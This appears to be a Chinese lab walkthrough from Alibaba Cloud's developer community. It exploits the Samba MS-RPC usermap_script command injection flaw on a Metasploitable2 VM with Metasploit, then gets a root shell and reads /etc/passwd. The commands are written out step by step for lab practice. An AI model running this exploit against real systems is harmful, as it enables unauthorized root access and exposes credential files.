AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Samba MS-RPC Shell命令注入漏洞

2022-12-13 233
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 靶场环境:metasploitable2靶机地址:192.168.0.109攻击机地址:192.168.0.114首先打开kali,启动msf框架

靶场环境:metasploitable2

靶机地址:192.168.0.109

攻击机地址:192.168.0.114

首先打开kali,启动msf框架

sudo msfdb run

image.png搜索漏洞模块

image.png

选择要利用的模块:

use exploit/multi/samba/usermap_script

image.png

查看所需要设置的参数

show options

我们看到只需要设置RHOSTS(靶机地址)

set rhosts 192.168.0.109

image.png

开始攻击

exploit

image.png

攻击成功

试着执行一下ls命令

image.png

执行成功

whoami查看当前权限为root

image.png

查看靶机ip 

ip a

image.png

查看敏感文件

cat /etc/passwd

image.png

ctrl+c退出

文章标签:
Shell
安全
关键词:
Shell命令
RPC注入
RPC漏洞
Shell命令注入漏洞
Shell漏洞
郝奕程
目录
相关文章
蚝油菜花
|
20天前
|
人工智能 Shell iOS开发
AI Shell:在命令行里“对话” AI ,微软推出将 AI 助手引入命令行的 CLI 工具,打造对话式交互命令行
AI Shell 是一款强大的 CLI 工具,将人工智能直接集成到命令行中,帮助用户提高生产力。AI Shell 支持多种 AI 模型和助手,通过多代理框架提供丰富的功能和灵活的使用模式。
蚝油菜花
64 7
刘大猫.
|
25天前
|
Java Shell Windows
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
刘大猫.
37 1
java冯坚持
|
2月前
|
Web App开发 网络协议 Linux
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
这篇文章是关于Linux命令的总结,涵盖了从基础操作到网络配置等多个方面的命令及其使用方法。
java冯坚持
75 1
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
听白
|
2月前
|
Shell 知识图谱
Shell printf 命令
10月更文挑战第3天
听白
23 1
游客qsxez56gggwqy
|
2月前
|
存储 安全 Shell
上传漏洞利用时,没有回显上传目录怎么连接shell
上传漏洞利用时,没有回显上传目录怎么连接shell
游客qsxez56gggwqy
123 2
小Lee
|
2月前
|
Unix Shell Linux
常见的shell命令
shell常用命令
小Lee
51 11
游客qeoynko2nmbgk
|
3月前
|
Shell Linux
Linux shell编程学习笔记82:w命令——一览无余
Linux shell编程学习笔记82:w命令——一览无余
游客qeoynko2nmbgk
72 7
刘大猫.
|
3月前
|
Java Shell Windows
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
刘大猫.
116 5
听白
|
2月前
|
Shell PHP
Shell echo命令
10月更文挑战第3天
听白
23 0
蓝易云
|
2月前
|
JSON Java Shell
Dockerfile中RUN、CMD、ENTRYPOINT、SHELL命令的区别
理解这些指令的差异和应用场景,有助于构建高效、灵活且易于管理的Docker镜像。在实际应用中,根据需要选择合适的指令,可以有效地控制镜像构建和容器运行的行为。
蓝易云
199 0

热门文章

最新文章

  • 1
    更改mysql表引擎(shell)
  • 2
    shell find一段时间内哪些文件被修改过
  • 3
    shell语法
  • 4
    Shell脚本编程实践——第4关:编写一个脚本,计算txt文件中每一行单词的个数并将结果写入另一个文件
  • 5
    shell脚本示例
  • 6
    adb shell查看sqlite数据库
  • 7
    一个循环改名的shell
  • 8
    读书笔记--101个shell脚本 之#11--炫
  • 9
    解决脚本文件无法执行conda命令的问题:CommandNotFoundError: Your shell has not been properly configured to use
  • 10
    使用shell生成状态报表
  • 1
    java利用xml-rpc协议操作wordpress博客
    86
  • 2
    一个不错的的rpc开源代码-rest_rpc
    121
  • 3
    【Dubbo3技术专题】「云原生微服务开发实战」 一同探索和分析研究RPC服务的底层原理和实现
    161
  • 4
    【分布式技术专题】「分布式技术架构」实践见真知,手把手教你如何实现一个属于自己的RPC框架(架构技术引导篇)
    289
  • 5
    【Dubbo3技术专题】「服务架构体系」第一章之Dubbo3新特性要点之RPC协议分析介绍
    97
  • 6
    RPC 通信与MQ 消息队列通信的微服务架构区别
    108
  • 7
    Spring Boot整合Dubbo+Zookeeper实现RPC调用
    187
  • 8
    RPC远程服务如何调用
    76
  • 9
    最简最快了解RPC核心流程
    97
  • 10
    从1开始,扩展Go语言后端业务系统的RPC功能
    93

    • 相关课程

    更多
  • Linux Shell 编程
  • Shell 脚本进阶
  • Shell 脚本入门
  • Linux Shell 编程入门与实战
  • Shell 编程入门到精通
  • Linux Web服务器Nginx搭建与配置

    • 相关电子书

    更多
  • Shell 脚本速查手册
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • Alibaba Cloud Linux操作系统Shell程序
    • 下一篇
    阿里云无影云电脑免费试用,最长可试用3个月